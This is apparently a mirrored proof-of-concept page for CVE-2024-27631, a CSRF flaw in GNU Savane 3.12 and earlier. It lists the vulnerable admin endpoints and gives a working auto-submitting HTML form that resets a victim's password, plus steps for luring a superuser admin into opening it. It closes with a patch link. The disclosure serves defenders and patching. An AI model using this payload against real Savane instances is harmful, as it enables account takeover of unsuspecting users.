Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-27631 PoC — GNU Savane 安全漏洞

Source
https://github.com/ally-petitt/CVE-2024-27631
Associated Vulnerability
Title:GNU Savane 安全漏洞 (CVE-2024-27631)
Description:GNU Savane是美国GNU社区的一套合作软件发展管理系统。 GNU Savane v.3.12及之前版本存在安全漏洞,该漏洞源于存在跨站请求伪造漏洞,允许远程攻击者通过siteadmin/usergroup.php升级权限。
Description
CVE-2024–27631 Reference
Readme
# CVE-2024-27631 Vulnerability Details

## Overview

In Savane v3.12 and prior, a lack of CSRF protection on administrative functions can allow for privilege escalation and/or account takeover. In particular, the endpoint `/siteadmin/usergroup.php` includes the functionality to change the passwords and administrative flags of other users, effectively allowing an attacker to make themselves administrator. 

Other notable endpoints vulnerable to CSRF include:

- /support/admin/userperms.php - Changes the permissions of who can post on a tracker.
- /project/admin/conf-copy.php - Overwrites the existing configuration of a group with a copy of another one.
- /project/admin/editgroupnotifications.php - Edits group notifications. Private items can be sent to public mailing lists.
- /project/admin/useradmin.php - Deletes users from a group.
- /news/admin/index.php - Edits the news tracker email address.
- /people/editjob.php - Adds a job for a group.


**CWE Classification:** CWE-352: Cross-Site Request Forgery (CSRF)

**Reported By:** Ally Petitt 

**Affected Product**: Savane

**Affected Versions**: 3.12 and prior

## Validation Steps
This is a Proof-of-Concept (PoC) for changing the password of another user's account as a pathway to account takeover.

1. Select a victim user whose password will be changed.
2. Note their userID from their profile page (`/users/<username>`).
3. Create the following malicious webpage, replacing user_id with the victim's user ID and `<savane_instance>` with the proper domain name/host address.
```
<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">

    <input name="form_pw" type="hidden" value="Password1!" />
    <input name="form_pw2" type="hidden" value="Password1!" />
    <input name="user_id" type="hidden" value="<user_id>" />
    <input name="update" type="hidden" value="Update" />
    <input type="submit" value="Submit Request" />
</form>

<script>
document.getElementById("autosubmit").submit();
</script>

```

4. Host the malicious HTML page on a webserver and send the link to an admin (they must be in superuser mode for this to work).
5. After they click the link, log in to the victim account with the very secure password `Password1!`.

_Note that this PoC script was tested on Firefox v103.0 (64-bit)._

## Mitigation

Upgrade to Savane version 3.13 or higher. The patch can be found [here](https://git.savannah.nongnu.org/cgit/administration/savane.git/commit/?h=i18n&id=d3962d3feb75467489b869204db98e2dffaaaf09).
File Snapshot

 [4.0K]  /data/pocs/f86bc7df129891454b8391c52d161285e5dc398c
└── [2.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.